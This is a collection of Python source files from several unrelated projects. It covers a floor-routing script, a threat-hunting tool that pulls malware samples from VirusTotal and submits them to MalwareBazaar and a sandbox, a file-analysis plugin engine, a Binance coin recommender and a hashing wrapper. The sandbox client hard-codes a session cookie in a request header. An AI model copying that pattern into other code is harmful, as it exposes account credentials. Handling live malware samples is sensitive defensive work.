elevator = []
for feature in floorFeatures[i]:
if feature.getType() == "elevator":
elevator.append(Feature(feature.getFeature()))
floorElevators.append(elevator)
# initializing each floor's poster
floorPoster = []
for i in range(0, floorNumber):
poster = []
for feature in floorFeatures[i]:
if feature.getType() == "poster":
poster.append(Poster(feature.getFeature()))
floorPoster.append(poster)
# calculating each floor's route
totalWeight = getWeight(floorVertex) # return a list of weight (index represent floor)
floorDist = []
floorNext = []
totalNext = []
for i in range(0, len(totalWeight)):
d, n , tn = Floyd_Warshall(totalWeight[i]) # return two list of two dim
floorDist.append(d)
floorNext.append(n)
totalNext.append(tn)
# store all the data of each floor
floorCollection = []
for i in range(0, floorNumber):
floorCollection.append({
"features": floorFeatures[i],
"vertexes": floorVertex[i],
"elevators": floorElevators[i],
"dist": floorDist[i],
"next": floorNext[i]
})
# calculating the route and other information for all floor
totalRoute = [] # a four dim list [startFloor][targetFloor][startPoint][endPoint]
totalElevator = [] # a four dim list to record the elevator between two points
for i in range(0, floorNumber):
routes = []
EIDS = []
for j in range(0, floorNumber):
if i == j:
routes.append(floorDist[i])
# n for numbers of vertex of each floor
n = len(floorVertex[i])
EIDS.append([[None for i in range(n)] for j in range(n)])
continue
route, EID = getRoute(floorCollection[i], floorCollection[j])
routes.append(route)
EIDS.append(EID)
totalRoute.append(routes)
totalElevator.append(EIDS)
# change a list of index number into a list of coordinate
totalRouteCoord = []
for i in range(0, floorNumber):
floorRouteCoord = []
for j in range(0, len(totalNext[i])):
routeCoord = []
for k in range(0, len(totalNext[i][j])):
coords = []
for vertex_index in totalNext[i][j][k]:
coords.append(floorVertex[i][vertex_index].getCoordinate())
routeCoord.append(coords)
floorRouteCoord.append(routeCoord)
totalRouteCoord.append(floorRouteCoord)
totalRouteRot = []
for i in range(0, floorNumber):
floorRouteRot = []
for j in range(0, len(totalNext[i])):
routeRot = []
for k in range(0, len(totalNext[i][j])):
rotation = []
for vertex_index in totalNext[i][j][k]:
rotation.append(floorVertex[i][vertex_index].getRotation())
routeRot.append(rotation)
floorRouteRot.append(routeRot)
totalRouteRot.append(floorRouteRot)
parseSave(totalRoute, totalElevator, floorVertex, totalNext, totalRouteCoord, totalRouteRot)
``` |
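`Floyd_Warshall` above returns the distance matrix, the successor matrix, and the fully expanded paths; a tiny sketch on a 3-vertex graph (weights invented):
```python
INF = 1E9  # same sentinel route.py uses for "no edge"
weight = [
    [0,   5,   INF],
    [5,   0,   2],
    [INF, 2,   0],
]
d, nxt, paths = Floyd_Warshall(weight)
print(d[0][2])      # 7: going 0 -> 1 -> 2 beats the missing direct edge
print(paths[0][2])  # [1, 2]: the vertices after 0, ending at the target
```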
{
"source": "a232319779/hihunter",
"score": 3
} |
#### File: hihunter/common/json2tree.py
```python
from io import StringIO
_branch_extend = '│ '
_branch_mid = '├─ '
_branch_last = '└─ '
_spacing = ' '
lang_map = {
    'process': '启动',   # "launch"
    'behavior': '操作',  # "operate"
    'drop': '释放',      # "drop/release"
    'net': '连接'        # "connect"
}
def _getHierarchy(graph, name='', file=None, _prefix='', _last=True):
""" Recursively parse json data to print data types """
if isinstance(graph, dict):
op_type = graph.get('type', '')
if op_type:
name = lang_map.get(op_type, op_type) + ' ' + graph.get('name')
print(_prefix, _branch_last if _last else _branch_mid, \
name, sep="", file=file)
_prefix += _spacing if _last else _branch_extend
length = len(graph)
for i, key in enumerate(graph.keys()):
_last = i == (length - 1)
_getHierarchy(graph[key], '"' + key + '"', file, _prefix, _last)
elif isinstance(graph, list):
for each_json in graph:
_getHierarchy(each_json, '', file, _prefix, _last=True)
else:
pass
def graph2tree(graph):
messageFile = StringIO()
_getHierarchy(graph, file=messageFile)
message = messageFile.getvalue()
messageFile.close()
return message
```
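A small sketch feeding `graph2tree` a nested behavior graph; the keys and names below are invented to show the output shape (scalar values print nothing, and each list item is rendered as a last branch):
```python
graph = {
    "type": "process",
    "name": "a.exe",
    "children": [
        {"type": "drop", "name": "b.dll"},
        {"type": "net", "name": "evil.example.com"},
    ],
}
print(graph2tree(graph))
# └─ 启动 a.exe
#    └─ 释放 b.dll
#    └─ 连接 evil.example.com
```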
#### File: hihunter/reddripsandbox/reddripsandbox.py
```python
import os
import json
import requests
from hihunter.common.common import *
from hihunter.common.json2tree import graph2tree
class ReddripSandbox(object):
def __init__(self, api_key):
self.api_key = api_key
def upload(self, file_name):
"""
{
"data": {
"filename": "118cfee735fbdcf08801ff2c1ca850c2",
"id": [
"AX6uN15jCf0-QUp-cYQr"
],
"md5": "118cfee735fbdcf08801ff2c1ca850c2",
"sha1": "e8d92b83a04122d73cb8aabe1c107034b59875a4"
},
"msg": "ok",
"status": 10000
}
"""
try:
url = "https://sandbox.ti.qianxin.com/sandbox/api/v1/token/{token}/submit/file".format(token=self.api_key)
file_payload = open(file_name, 'rb').read()
base_name = os.path.basename(file_name)
response = requests.request("POST", url, files={'file':(base_name, file_payload)})
res_js = response.json()
if res_js.get('status', 0) == 10000:
sandbox_data = res_js.get('data', {})
return return_data(10000, 'upload success', sandbox_data)
return return_data(30003, 'upload failed', res_js)
except Exception as e:
return return_data(30002, str(e), {})
def __parse_report__(self, report_json):
cut_report_json = dict()
dynamic_detect = report_json.get('dynamic_detect', {})
graph = dynamic_detect.get('host_behavior', {}).get('graph', {})
graph_tree = graph2tree(graph)
network_behavior = dynamic_detect.get('network_behavior', {})
dns = network_behavior.get('dns', {})
domains = list()
if dns.get('total', 0) > 0:
datas = dns.get('data', [])
for data in datas:
domains.append(data.get('request', ''))
session = network_behavior.get('session', {})
hosts = list()
if session.get('total', 0) > 0:
datas = session.get('data', [])
for data in datas:
hosts.append(data.get('ip', ''))
http = network_behavior.get('http', {})
urls = list()
if http.get('total', 0) > 0:
datas = http.get('data', [])
for data in datas:
urls.append(data.get('url'))
ti = dynamic_detect.get('threat_analyze', {}).get('ti', {})
ti_tags = list()
if ti.get('total', 0) > 0:
datas = ti.get('data', [])
for data in datas:
ti_tags.append(data.get('malicious_type', []))
ti_tags.extend(data.get('family', []))
web_url = report_json.get('web_url', '')
task_id = ''
if web_url:
task_id = web_url.split('=')[-1]
basic_info = dynamic_detect.get('static_analyze', {}).get('basic_info', {})
cut_report_json['md5'] = basic_info.get('md5')
cut_report_json['sha1'] = basic_info.get('sha1')
cut_report_json['score'] = basic_info.get('score')
ti_tags.extend(basic_info.get('file_tags', []))
cut_report_json['graph'] = graph_tree
domains = list(set(domains))
hosts = list(set(hosts))
urls = list(set(urls))
ti_tags = list(set(ti_tags))
cut_report_json['has_network'] = len(domains) + len(hosts) + len(urls)
cut_report_json['domains'] = ','.join(domains)
cut_report_json['hosts'] = ','.join(hosts)
cut_report_json['urls'] = ','.join(urls)
cut_report_json['ti_tags'] = ','.join(ti_tags)
cut_report_json['task_id'] = task_id
return cut_report_json
def report(self, report_id):
"""
{
"data": {
"AX6uP6TPCf0-QUp-cYo0": {
"condition": 2,
"desc": "no report",
"dynamic_detect": {},
"static_detect": {},
"web_url": ""
}
},
"msg": "ok",
"status": 10000
}
"""
try:
url = "https://sandbox.ti.qianxin.com/sandbox/api/v1/token/{token}/report".format(token=self.api_key)
payload = [
{
"type": "file",
"value": report_id
}
]
headers = {
'content-type': "application/json",
'charset': "utf-8"
}
response = requests.request("POST", url, data=json.dumps(payload), headers=headers)
res_js = response.json()
if res_js.get('data', {}).get(report_id, {}).get('condition', -1) == 2:
return return_data(30004, 'no report', res_js)
else:
parse_data = self.__parse_report__(res_js.get('data', {}).get(report_id, {}))
return return_data(10000, 'report success', parse_data)
except Exception as e:
return return_data(30001, str(e), {})
def screen_shot(self, report_id):
"""
        {
            "data": [
                "xxxx"
            ],
            "msg": "ok",
            "status": 10000
        }
"""
try:
url = "https://sandbox.ti.qianxin.com/sandbox/report/dynamic/get/screenshot/file/{report_id}".format(report_id=report_id)
headers = {
'Accept-Encoding': 'gzip, deflate, br',
'Referer': 'https://sandbox.ti.qianxin.com/sandbox/page/detail?type=file&id={report_id}'.format(report_id=report_id),
'Host': 'sandbox.ti.qianxin.com',
'Cookie': 'lang=chinese; session=2e9aac64-2b28-4b1e-b61f-0ecd57e03046'
}
response = requests.request("GET", url, headers=headers)
data = response.json().get('data', [])
data_len = len(data)
pic = ''
if data_len > 0:
                # Pick a screenshot roughly three quarters of the way through the run.
                choose_num = int(data_len / 2) + int(data_len / 4)
pic = data[choose_num]
return return_data(10000, 'report success', pic)
except Exception as e:
return return_data(30001, str(e), {})
```
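Taken together, `upload`, `report`, and `screen_shot` form a submit/poll/fetch workflow. A minimal driver sketch, assuming a valid API key, a placeholder sample path, and that the `return_data` helper yields `{'status', 'msg', 'data'}` dicts (as the calls in `run.py` below suggest):
```python
# Hypothetical driver; the key, path, and 60s polling interval are placeholders.
import time

from hihunter.reddripsandbox.reddripsandbox import ReddripSandbox

sandbox = ReddripSandbox(api_key="YOUR_API_KEY")

submit = sandbox.upload("./files/sample.bin")
if submit.get('status') == 10000:
    # The sandbox returns the assigned serial id as a one-element list.
    serial_id = submit.get('data', {}).get('id', [''])[0]
    while True:
        report = sandbox.report(serial_id)
        if report.get('status') == 10000:
            print(report.get('data', {}).get('score'))
            break
        time.sleep(60)  # status 30004 means the report is not ready yet
```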
#### File: hihunter/hihunter/run.py
```python
import os
import argparse
import json
import time
from urllib.parse import quote
from hihunter.virustotal.virustotal import VirusTotal
from hihunter.malwarebazaar.malwarebazaar import MalwareBazaar
from hihunter.reddripsandbox.reddripsandbox import ReddripSandbox
from hihunter.common.postgre_db import HiHunterDB, HiHunterRSDatas
from hihunter.common.common import parse_config
config_help = 'config path. default value: ./hihunter_config.json'
dir_help = 'sample path. default value: ./files'
number_help = 'process number. default value: 10'
def run_vt_filter():
try:
epilog = "Use like: hihunter-vt-filter -c $config"
parser = argparse.ArgumentParser(prog='HiHunter virustotal data filter tool.',
description='Version 0.0.1',
epilog=epilog,
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument('-c', '--config', help=config_help,
type=str, dest='config_file', action='store', default='./hihunter_config.json')
parser.add_argument('-n', '--number', help=number_help,
type=int, dest='number', action='store', default=10)
args = parser.parse_args()
except Exception as e:
print('error: %s' % str(e))
exit(0)
vt_filter_config = parse_config(args.config_file)
vt = VirusTotal(api_key=vt_filter_config.get('api_key'))
quota_data = vt.api_key_statics()
print(json.dumps(quota_data, indent=4))
utc_time_end = int(time.time())
delay = vt_filter_config.get('delay', 0)
utc_time_start = utc_time_end - 3600 * 8 - 3600 * delay
querys = []
for query in vt_filter_config.get('querys', []):
querys.append('{0} fs:{1}+ fs:{2}-'.format(query, utc_time_start, utc_time_end))
hhd = HiHunterDB(vt_filter_config)
hhd.contected()
limit = args.number
for query in querys:
query = quote(query)
filter_data = vt.filter(query=query, limit=limit)
sample_datas = filter_data.get('data', {}).get('data', [])
print(json.dumps(sample_datas, indent=4))
hhd.add_vt_data(sample_datas)
# close session
hhd.close()
def run_vt_usage():
try:
epilog = "Use like: hihunter-vt-usage -c $config"
parser = argparse.ArgumentParser(prog='Virustotal api usage statics.',
description='Version 0.0.1',
epilog=epilog,
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument('-c', '--config', help=config_help,
type=str, dest='config_file', action='store', default='./hihunter_config.json')
args = parser.parse_args()
except Exception as e:
print('error: %s' % str(e))
exit(0)
vt_filter_config = parse_config(args.config_file)
vt = VirusTotal(api_key=vt_filter_config.get('api_key'))
quota_data = vt.api_key_statics()
print(json.dumps(quota_data, indent=4))
def run_create_table():
try:
epilog = "Use like: hihunter-create-pg-table -c $config"
parser = argparse.ArgumentParser(prog='Create postgre db tables.',
description='Version 0.0.1',
epilog=epilog,
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument('-c', '--config', help=config_help,
type=str, dest='config_file', action='store', default='./hihunter_config.json')
args = parser.parse_args()
except Exception as e:
print('error: %s' % str(e))
exit(0)
vt_filter_config = parse_config(args.config_file)
hhd = HiHunterDB(vt_filter_config)
hhd.contected()
hhd.create_table()
# close session
hhd.close()
def run_vt_download():
try:
epilog = "Use like: hihunter-vt-download -c $config -d $save_path -k $hash"
parser = argparse.ArgumentParser(prog='Virustotal sample download tool.',
description='Version 0.0.1',
epilog=epilog,
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument('-c', '--config', help=config_help,
type=str, dest='config_file', action='store', default='./hihunter_config.json')
parser.add_argument('-d', '--dir', help=dir_help,
type=str, dest='save_path', action='store', default='./files')
parser.add_argument('-k', '--key', help='download sample hash',
type=str, dest='key', action='store', default=None)
args = parser.parse_args()
except Exception as e:
print('error: %s' % str(e))
exit(0)
vt_filter_config = parse_config(args.config_file)
vt = VirusTotal(api_key=vt_filter_config.get('api_key'))
quota_data = vt.api_key_statics()
print(json.dumps(quota_data, indent=4))
download_path = args.save_path
file_sha1 = args.key
download_data = vt.download(file_sha1, download_path=download_path)
print(json.dumps(download_data, indent=4))
def run_mb_upload():
try:
epilog = "Use like: hihunter-mb-upload -c $config -d $save_path"
parser = argparse.ArgumentParser(prog='MalwareBazaar sample upload tool.',
description='Version 0.0.1',
epilog=epilog,
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument('-c', '--config', help=config_help,
type=str, dest='config_file', action='store', default='./hihunter_config.json')
parser.add_argument('-d', '--dir', help=dir_help,
type=str, dest='save_path', action='store', default='./files')
parser.add_argument('-t', '--type', help='upload sample type, default value: "MS Word Document", support type: ["MS Word Document","Office Open XML Document","Email","Windows shortcut"]',
type=str, dest='file_type', action='store', default='MS Word Document')
parser.add_argument('-n', '--number', help=number_help,
type=int, dest='number', action='store', default=10)
args = parser.parse_args()
except Exception as e:
print('error: %s' % str(e))
exit(0)
vt_filter_config = parse_config(args.config_file)
vt = VirusTotal(api_key=vt_filter_config.get('api_key'))
quota_data = vt.api_key_statics()
print(json.dumps(quota_data, indent=4))
hhd = HiHunterDB(vt_filter_config)
hhd.contected()
mb = MalwareBazaar(api_key=vt_filter_config.get('mb_api_key'))
download_path = args.save_path
file_type = args.file_type
download_limit = args.number
file_sha1s = hhd.get_mb_sha1s(file_type, download_limit)
for file_sha1 in file_sha1s:
if file_sha1:
download_data = vt.download(file_sha1, download_path=download_path)
print(json.dumps(download_data, indent=4))
file_path = os.path.join(download_path, file_sha1)
upload_data = mb.upload(file_path)
print(json.dumps(upload_data, indent=4))
hhd.update_vt_by_sha1(file_sha1)
# close session
hhd.close()
def run_rs_upload():
try:
epilog = "Use like: hihunter-rs-upload -c $config -d $save_path"
parser = argparse.ArgumentParser(prog='Reddrip sandbox sample upload tool.',
description='Version 0.0.1',
epilog=epilog,
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument('-c', '--config', help=config_help,
type=str, dest='config_file', action='store', default='./hihunter_config.json')
parser.add_argument('-d', '--dir', help=dir_help,
type=str, dest='save_path', action='store', default='./files')
parser.add_argument('-n', '--number', help=number_help,
type=int, dest='number', action='store', default=10)
args = parser.parse_args()
except Exception as e:
print('error: %s' % str(e))
exit(0)
vt_filter_config = parse_config(args.config_file)
hhd = HiHunterDB(vt_filter_config)
hhd.contected()
all_submit_sha1s = hhd.get_all_sha1s(HiHunterRSDatas)
upload_path = args.save_path
upload_number = args.number
sandbox_api_key = vt_filter_config.get('sandbox_api_key', '')
rs = ReddripSandbox(api_key=sandbox_api_key)
upload_datas = list()
count = 0
for file_name in os.listdir(upload_path):
        # Skip samples that have already been submitted
if file_name in all_submit_sha1s:
continue
upload_data = dict()
file_full_path = os.path.join(upload_path, file_name)
return_data = rs.upload(file_full_path)
res_data = return_data.get('data', {})
upload_data['md5'] = res_data.get('md5', '')
upload_data['sha1'] = res_data.get('sha1', '')
upload_data['serial_id'] = res_data.get('id', [''])[0]
upload_data['sandbox_status'] = 0
print(json.dumps(upload_data, indent=4, ensure_ascii=False))
upload_datas.append(upload_data)
count += 1
if count >= upload_number:
break
hhd.add_rs_data(upload_datas)
# close session
hhd.close()
def run_rs_update():
try:
epilog = "Use like: hihunter-rs-upload -c $config"
parser = argparse.ArgumentParser(prog='Reddrip sandbox sample update tool.',
description='Version 0.0.1',
epilog=epilog,
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument('-c', '--config', help=config_help,
type=str, dest='config_file', action='store', default='./hihunter_config.json')
parser.add_argument('-n', '--number', help=number_help,
type=int, dest='number', action='store', default=10)
args = parser.parse_args()
except Exception as e:
print('error: %s' % str(e))
exit(0)
vt_filter_config = parse_config(args.config_file)
hhd = HiHunterDB(vt_filter_config)
hhd.contected()
sandbox_api_key = vt_filter_config.get('sandbox_api_key', '')
rs = ReddripSandbox(api_key=sandbox_api_key)
rs_update_limit = args.number
serial_ids = hhd.get_rs_serial_id(0, rs_update_limit)
for serial_id in serial_ids:
return_data = rs.report(serial_id)
report_data = return_data.get('data', {})
print(18 * '-' + serial_id + 18 * '-')
print(report_data.get('graph'))
if return_data.get('status', -1) == 10000:
hhd.update_rs_by_serial_id(report_data, serial_id)
# close session
hhd.close()
def run_rs_download_screenshot():
try:
epilog = "Use like: hihunter-rs-download-screenshot -c $config"
parser = argparse.ArgumentParser(prog='Reddrip sandbox sample screenshot download tool.',
description='Version 0.0.1',
epilog=epilog,
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument('-c', '--config', help=config_help,
type=str, dest='config_file', action='store', default='./hihunter_config.json')
parser.add_argument('-d', '--dir', help='save screenshot path. default value: ./hihunter_screenshot',
type=str, dest='save_path', action='store', default='./hihunter_screenshot')
parser.add_argument('-n', '--number', help=number_help,
type=int, dest='number', action='store', default=10)
args = parser.parse_args()
except Exception as e:
print('error: %s' % str(e))
exit(0)
vt_filter_config = parse_config(args.config_file)
hhd = HiHunterDB(vt_filter_config)
hhd.contected()
sandbox_api_key = vt_filter_config.get('sandbox_api_key', '')
rs = ReddripSandbox(api_key=sandbox_api_key)
rs_update_limit = args.number
screen_shot_path = args.save_path
serial_ids = hhd.get_rs_serial_id(1, rs_update_limit)
for serial_id in serial_ids:
screen_data = rs.screen_shot(serial_id)
pic_data = screen_data.get('data', '')
if pic_data:
screen_shot_name = '{}.jpg'.format(serial_id)
down_screen_shot_path = os.path.join(screen_shot_path, screen_shot_name)
print('save screenshot at: {}'.format(down_screen_shot_path))
with open(down_screen_shot_path, 'w') as f:
f.write(pic_data)
hhd.update_rs_by_serial_id_screenshot(serial_id)
else:
print('{} not found screenshot'.format(serial_id))
# close session
hhd.close()
``` |
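All of the entry points above read their settings from one JSON file via `parse_config`. The real schema lives in `hihunter.common`, but from the keys accessed here a placeholder config might be sketched like this (every value is made up, and the database key names required by `HiHunterDB` are assumptions):
```python
# Write a placeholder hihunter_config.json; the top-level keys mirror the
# .get() calls in run.py, while the db_* keys are assumed.
import json

config = {
    "api_key": "VT_API_KEY",          # VirusTotal
    "mb_api_key": "MB_API_KEY",       # MalwareBazaar
    "sandbox_api_key": "RS_API_KEY",  # Reddrip sandbox
    "delay": 0,                        # extra hours subtracted from the fs: window
    "querys": ["type:doc positives:10+"],
    "db_host": "localhost",
    "db_user": "hihunter",
    "db_password": "secret",
}

with open("hihunter_config.json", "w") as fh:
    json.dump(config, fh, indent=4)
```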
{
"source": "a232319779/mmpi",
"score": 2
} |
#### File: mmpi/core/plugins.py
```python
import os
import importlib
import logging
import mmpi
from mmpi.common.filetypes import get_support_file_type
from mmpi.common.exceptions import DependencyError, ProcessingError
log = logging.getLogger(__name__)
def enumerate_plugins(dirpath, module_prefix, namespace, class_,
attributes={}, as_dict=False):
"""Import plugins of type `class` located at `dirpath` into the
`namespace` that starts with `module_prefix`. If `dirpath` represents a
filepath then it is converted into its containing directory. The
`attributes` dictionary allows one to set extra fields for all imported
plugins. Using `as_dict` a dictionary based on the module name is
returned."""
if os.path.isfile(dirpath):
dirpath = os.path.dirname(dirpath)
for fname in os.listdir(dirpath):
if fname.endswith(".py") and not fname.startswith("__init__"):
module_name, _ = os.path.splitext(fname)
try:
importlib.import_module(
"%s.%s" % (module_prefix, module_name)
)
except ImportError as e:
raise ImportError(
"Unable to load theplugin at %s: %s. Please "
"review its contents and/or validity!" % (fname, e)
)
subclasses = class_.__subclasses__()[:]
plugins = []
while subclasses:
subclass = subclasses.pop(0)
        # Include subclasses of this subclass (there are some subclasses, e.g.,
        # LibVirtMachinery, that fail the following module namespace check and
        # as such we perform this logic here).
subclasses.extend(subclass.__subclasses__())
# Check whether this subclass belongs to the module namespace that
# we're currently importing. It should be noted that parent and child
# namespaces should fail the following if-statement.
if module_prefix != ".".join(subclass.__module__.split(".")[:-1]):
continue
namespace[subclass.__name__] = subclass
for key, value in attributes.items():
setattr(subclass, key, value)
plugins.append(subclass)
if as_dict:
ret = {}
for plugin in plugins:
ret[plugin.__module__.split(".")[-1]] = plugin
return ret
return sorted(plugins, key=lambda x: x.__name__.lower())
class RunProcessing(object):
"""Analysis Results Processing Engine.
This class handles the loading and execution of the processing modules.
It executes the enabled ones sequentially and generates a dictionary which
is then passed over the reporting engine.
"""
def __init__(self, data):
"""@param task: task dictionary of the analysis to process."""
self.file_type = get_support_file_type(data.get('file_type'))
self.file_content = data.get('content')
def process(self, module, results):
"""Run a processing module.
@param module: processing module to run.
@param results: results dict.
@return: results generated by module.
"""
if not module.enabled:
return None, None
# Initialize the specified processing module.
try:
current = module()
except:
log.warning(
"Failed to load the processing module: %s",
module, extra={"file_content": self.file_content}
)
return None, None
# Give it the path to the analysis results.
current.set_content(self.file_content)
current.set_type(self.file_type)
current.set_results(results)
try:
# Run the processing module and retrieve the generated data to be
# appended to the general results container.
data = current.run()
log.debug(
"Executed processing module \"%s\" for task #%s",
current.__class__.__name__, self.file_content
)
            # If it succeeded, return the module's key name and the data.
return current.key, data
except DependencyError as e:
log.warning(
"The processing module \"%s\" has missing dependencies: %s",
current.__class__.__name__, e
)
except ProcessingError as e:
log.warning(
"The processing module \"%s\" returned the following "
"error: %s",
current.__class__.__name__, e
)
except Exception as e:
log.warning(
"Failed to run the processing module \"%s\" for task #%s:",
current.__class__.__name__, self.file_content
)
return None, None
def run(self):
"""Run all processing modules and all signatures.
@return: processing results.
"""
# This is the results container. It's what will be used by all the
# reporting modules to make it consumable by humans and machines.
# It will contain all the results generated by every processing
# module available. Its structure can be observed through the JSON
# dump in the analysis' reports folder. (If jsondump is enabled.)
        # We affectionately call this the "fat dict".
results = {
"_temp": {},
}
# Uses plain machine configuration as input.
# Order modules using the user-defined sequence number.
# If none is specified for the modules, they are selected in
# alphabetical order.
processing_list = mmpi.processing.plugins
# If no modules are loaded, return an empty dictionary.
if processing_list:
processing_list.sort(key=lambda module: module.order)
# Run every loaded processing module.
for module in processing_list:
key, result = self.process(module, results)
# If the module provided results, append it to the fat dict.
if key and result:
results['type'] = key
results['value'] = result
else:
log.info("No processing modules loaded")
results.pop("_temp", None)
# Return the fat dict.
return results
class RunSignatures(object):
"""Run Signatures."""
available_signatures = []
def __init__(self, results):
self.results = results
self.matched = []
# Initialize each applicable Signature.
self.signatures = []
for signature in self.available_signatures:
self.signatures.append(signature(self))
@classmethod
def init_once(cls):
cls.available_signatures = []
# Gather all enabled & up-to-date Signatures.
for signature in mmpi.signatures:
if cls.should_load_signature(signature):
cls.available_signatures.append(signature)
# Sort Signatures by their order.
cls.available_signatures.sort(key=lambda sig: sig.order)
@classmethod
def should_load_signature(cls, signature):
"""Should the given signature be enabled for this analysis?"""
if not signature.enabled or signature.name is None:
return False
if not cls.check_signature_version(signature):
return False
if hasattr(signature, "enable") and callable(signature.enable):
if not signature.enable():
return False
return True
@classmethod
def check_signature_version(cls, sig):
"""Check signature version.
@param sig: signature class/instance to check.
@return: check result.
"""
if hasattr(sig, "run"):
log.warning(
"This signatures features one or more deprecated functions "
"which indicates that it is very likely an old-style "
"signature. Please upgrade this signature: %s.", sig.name
)
return False
return True
def call_signature(self, signature, handler, *args, **kwargs):
"""Wrapper to call into 3rd party signatures. This wrapper yields the
event to the signature and handles matched signatures recursively."""
try:
if not signature.matched and handler(*args, **kwargs):
signature.matched = True
for sig in self.signatures:
self.call_signature(sig, sig.on_signature, signature)
except NotImplementedError:
return False
except:
log.warning(
"Failed to run '%s' of the %s signature",
handler.__name__, signature.name
)
return True
def run(self):
"""Run signatures."""
# Allow signatures to initialize themselves.
for signature in self.signatures:
signature.init()
log.debug("Running %d signatures", len(self.signatures))
# Yield completion events to each signature.
for sig in self.signatures:
self.call_signature(sig, sig.on_complete)
score, configs = 0, []
for signature in self.signatures:
if not signature.matched:
continue
log.debug(
"matched signature: %s", signature.name, extra={
"action": "signature.match", "status": "success",
"signature": signature.name,
"severity": signature.severity,
}
)
self.matched.append(signature.results())
score += signature.severity
# Sort the matched signatures by their severity level and put them
# into the results dictionary.
self.matched.sort(key=lambda key: key["severity"])
self.results.append({"type": "signatures", "value": {
"infos": self.matched, "datas": list()}})
```
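`RunProcessing.process` spells out the contract a processing module must satisfy: an `enabled` flag, an `order` used for sorting, a `key` naming its results, the three setters, and a `run()` method. A sketch of such a module, noting that the real base class mmpi plugins inherit from is not shown in this file:
```python
# Illustrative only: this class merely mirrors the attributes and methods
# that RunProcessing.process relies on; real mmpi plugins subclass a base
# class defined elsewhere so enumerate_plugins can discover them.
class EchoProcessing:
    enabled = True
    order = 1
    key = "echo"

    def set_content(self, content):
        self.content = content

    def set_type(self, file_type):
        self.file_type = file_type

    def set_results(self, results):
        self.results = results

    def run(self):
        # Whatever is returned here ends up under results['value'].
        return {"file_type": self.file_type, "size": len(self.content or b"")}
```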
#### File: mmpi/core/startup.py
```python
import logging
import mmpi
from mmpi.core.plugins import RunSignatures
log = logging.getLogger(__name__)
def init_modules():
"""Initializes plugins."""
log.debug("Imported modules...")
# categories = (
# "processing", "signatures"
# )
categories = (
"processing",
)
# Call the init_once() static method of each plugin/module. If an exception
# is thrown in that initialization call, then a hard error is appropriate.
for category in categories:
for module in mmpi.plugins[category]:
if module.enabled:
module.init_once()
for category in categories:
log.debug("Imported \"%s\" modules:", category)
entries = mmpi.plugins[category]
for entry in entries:
if entry == entries[-1]:
log.debug("\t `-- %s", entry.__name__)
else:
log.debug("\t |-- %s", entry.__name__)
RunSignatures.init_once()
``` |
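Putting the two modules together, the intended order appears to be: import the plugin packages (which populates `mmpi.plugins` via `enumerate_plugins`), call `init_modules()`, then run each sample through the engines. A rough sketch, with the sample path as a placeholder and the glue between processing output and signature input assumed:
```python
# Rough orchestration sketch; the real entry point in mmpi may wire
# processing results into RunSignatures differently.
from mmpi.core.startup import init_modules
from mmpi.core.plugins import RunProcessing, RunSignatures

init_modules()  # calls init_once() on every enabled plugin

data = {"file_type": "eml", "content": open("sample.eml", "rb").read()}
results = RunProcessing(data).run()

report = []                   # RunSignatures appends matched signatures here
RunSignatures(report).run()
```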
{
"source": "a232319779/nextb",
"score": 2
} |
#### File: nextb/tools/recommend.py
```python
import datetime
from nextb.libs.utils.parsecmd import nextb_cmd_parse
from nextb.libs.utils.parseini import NextBParseINI
from nextb.libs.platform.nextbbinance import NextBBiance
from nextb.libs.robot.leekrobot0 import analysis
from nextb.libs.db.nextbDB import NextBDB
def main():
cmd_args = nextb_cmd_parse()
robot_name = cmd_args.name
config_path = cmd_args.config
nbpi = NextBParseINI(config_path)
robot_config = nbpi.get_robot_config(robot_name)
proxies = {
"http": robot_config.get("http_proxy", ''),
"https": robot_config.get("https_proxy", '')
}
api_key = robot_config.get("api_key")
api_secret = robot_config.get("api_secret")
interval = robot_config.get("klines_interval")
nbb = NextBBiance(
api_key=api_key, api_secret=api_secret, proxies=proxies, increasing=True
)
datas = nbb.get_binance_klines_datas_inc(interval=interval, limit=2)
choose_list = analysis(datas)
if cmd_args.db:
db = NextBDB()
        recommend_data = {'robot_name': 'LeekRobot0', 'symbols': '', 'time': datetime.datetime.now()}
        symbols = ','.join([cl.get('symbol', 'ddvv') for cl in choose_list])
        recommend_data['symbols'] = symbols
        if symbols:
            recommend_data['count'] = symbols.count(',') + 1
        else:
            recommend_data['count'] = 0
        db.add_data(recommend_data)
if __name__ == "__main__":
main()
``` |
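`recommend.py` expects an INI file whose robot section supplies the proxy, API, and interval settings read above. A placeholder sketch, assuming `NextBParseINI.get_robot_config` maps a `[<robot_name>]` section to that dict (the section naming and file name are assumptions):
```python
# Create a placeholder config; the key names mirror the .get() calls above.
import configparser

config = configparser.ConfigParser()
config["LeekRobot0"] = {
    "http_proxy": "http://127.0.0.1:7890",
    "https_proxy": "http://127.0.0.1:7890",
    "api_key": "BINANCE_API_KEY",
    "api_secret": "BINANCE_API_SECRET",
    "klines_interval": "4h",
}

with open("nextb.ini", "w") as fh:
    config.write(fh)
```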
{
"source": "a232319779/python_mmdt",
"score": 2
} |
#### File: python_mmdt/mmdt/mmdt.py
```python
import os
import platform
import numpy as np
from ctypes import *
from python_mmdt.mmdt.common import mmdt_load, mmdt_std
SYSTEM_VER = platform.system().lower()
ENGINE_SUFFIX = {
"windows": "dll",
"darwin": "dylib",
"linux": "so"
}
class MMDT_Data(Structure):
_fields_ = [
("index_value", c_uint32),
("main_value1", c_uint32),
("main_value2", c_uint32),
("main_value3", c_uint32),
("main_value4", c_uint32),
]
class MMDT(object):
def __init__(self):
cwd = os.path.abspath(os.path.dirname(__file__))
lib_core_path = os.path.join(cwd, "libcore.{}".format(ENGINE_SUFFIX[SYSTEM_VER]))
mmdt_feature_file_name = os.path.join(cwd, "mmdt_feature.data")
mmdt_feature_label_file_name = os.path.join(cwd, "mmdt_feature.label")
self.datas = list()
self.labels = list()
self.build_datas = None
self.build_labels = None
if not os.path.exists(lib_core_path):
            raise FileNotFoundError("mmdt core library not found: %s" % lib_core_path)
if os.path.exists(mmdt_feature_file_name):
self.datas = mmdt_load(mmdt_feature_file_name)
if os.path.exists(mmdt_feature_label_file_name):
self.labels = mmdt_load(mmdt_feature_label_file_name)
